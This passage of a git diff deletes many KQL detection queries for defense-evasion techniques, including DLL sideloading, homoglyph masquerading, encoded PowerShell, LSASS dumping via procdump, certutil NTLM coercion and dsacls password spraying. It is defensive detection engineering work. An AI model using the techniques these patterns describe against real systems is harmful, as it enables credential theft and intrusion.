endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql deleted file mode 100644 index 1a7fb871..00000000 --- a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Micah Babinski, @micahbabinski -// Date: 2023/02/15 -// Level: high -// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. -This is used as an obfuscation and masquerading techniques. - -// Tags: attack.defense_evasion, attack.t1036.002 -DeviceProcessEvents -| where ProcessCommandLine contains "‮" \ No newline at end of file diff --git a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql b/Defense Evasion/Potential_EACore.DLL_Sideloading.kql deleted file mode 100644 index f843422e..00000000 --- a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: high -// Description: Detects potential DLL sideloading of "EACore.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql b/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql deleted file mode 100644 index fa643858..00000000 --- a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: high -// Description: Detects potential DLL sideloading of "edputil.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql deleted file mode 100644 index a07c661e..00000000 --- a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: low -// Description: Detects specific combinations of encoding methods in PowerShell via the commandline -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql b/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql deleted file mode 100644 index f6bdd5e5..00000000 --- a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: D3F7A5105 -// Date: 2023/01/02 -// Level: high -// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceRegistryEvents -| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql b/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql deleted file mode 100644 index 4f50439f..00000000 --- a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman -// Date: 2020/04/17 -// Level: medium -// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. -HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". -Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe - -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql deleted file mode 100644 index 45a8fd0c..00000000 --- a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: medium -// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE -The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http" \ No newline at end of file diff --git a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql b/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql deleted file mode 100644 index 27f1e8dc..00000000 --- a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql deleted file mode 100644 index fbde79fa..00000000 --- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Scoubi (@ScoubiMtl) -// Date: 2023/10/09 -// Level: medium -// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" - -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceFileEvents -| where FolderPath contains "::$index_allocation" \ No newline at end of file diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql deleted file mode 100644 index 879b3fc5..00000000 --- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl) -// Date: 2023/10/09 -// Level: medium -// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" - -// Tags: attack.defense_evasion, attack.t1564.004 -DeviceProcessEvents -| where ProcessCommandLine contains "::$index_allocation" \ No newline at end of file diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql deleted file mode 100644 index 196cf067..00000000 --- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Micah Babinski, @micahbabinski -// Date: 2023/05/07 -// Level: medium -// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. - -// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ") \ No newline at end of file diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql deleted file mode 100644 index 41664742..00000000 --- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Micah Babinski, @micahbabinski -// Date: 2023/05/08 -// Level: medium -// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. - -// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003 -DeviceFileEvents -| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ") \ No newline at end of file diff --git a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql deleted file mode 100644 index 3c74a001..00000000 --- a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022/10/21 -// Level: medium -// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. -// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql b/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql deleted file mode 100644 index 3d46efa4..00000000 --- a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/21 -// Level: high -// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql deleted file mode 100644 index 2d6086da..00000000 --- a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/10/30 -// Level: high -// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. -This way we are also able to catch cases in which the attacker has renamed the procdump executable. - -// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009 -DeviceProcessEvents -| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls" \ No newline at end of file diff --git a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql b/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql deleted file mode 100644 index 9b4a423d..00000000 --- a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis -// Date: 2018/06/07 -// Level: high -// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process -// Tags: attack.defense_evasion, attack.t1218.005 -DeviceProcessEvents -| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql b/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql deleted file mode 100644 index 3fce189b..00000000 --- a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/04/17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql b/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql deleted file mode 100644 index 4f76c2a3..00000000 --- a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/13 -// Level: high -// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql b/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql deleted file mode 100644 index 60343483..00000000 --- a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects execution of LiveKD based on PE metadata or image name -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql b/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql deleted file mode 100644 index 163f4b42..00000000 --- a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql b/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql deleted file mode 100644 index b0914264..00000000 --- a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: medium -// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\mftrace.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql deleted file mode 100644 index 327de0bf..00000000 --- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2022/08/02 -// Level: high -// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql deleted file mode 100644 index 46d0f2c6..00000000 --- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2022/08/01 -// Level: high -// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_MsiExec_Masquerading.kql b/Defense Evasion/Potential_MsiExec_Masquerading.kql deleted file mode 100644 index 7624082c..00000000 --- a/Defense Evasion/Potential_MsiExec_Masquerading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/11/14 -// Level: high -// Description: Detects the execution of msiexec.exe from an uncommon directory -// Tags: attack.defense_evasion, attack.t1036.005 -DeviceProcessEvents -| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql b/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql deleted file mode 100644 index 5c519edc..00000000 --- a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql b/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql deleted file mode 100644 index 39dcb31d..00000000 --- a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock -// Date: 2021/10/07 -// Level: high -// Description: Detects registry keys related to NetWire RAT -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\software\\NetWire" \ No newline at end of file diff --git a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql b/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql deleted file mode 100644 index 1cd01f26..00000000 --- a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/17 -// Level: medium -// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql b/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql deleted file mode 100644 index de4b3519..00000000 --- a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects possible password spraying attempts using Dsacls -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") \ No newline at end of file diff --git a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql b/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql deleted file mode 100644 index 720a8993..00000000 --- a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/01/27 -// Level: medium -// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot. -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceRegistryEvents -| where (ActionType =~ "RegistryValueSet" and RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations") and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql b/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql deleted file mode 100644 index 5e923f8b..00000000 --- a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/30 -// Level: medium -// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryValueData startswith "URL:" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\CLASSES") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Defense 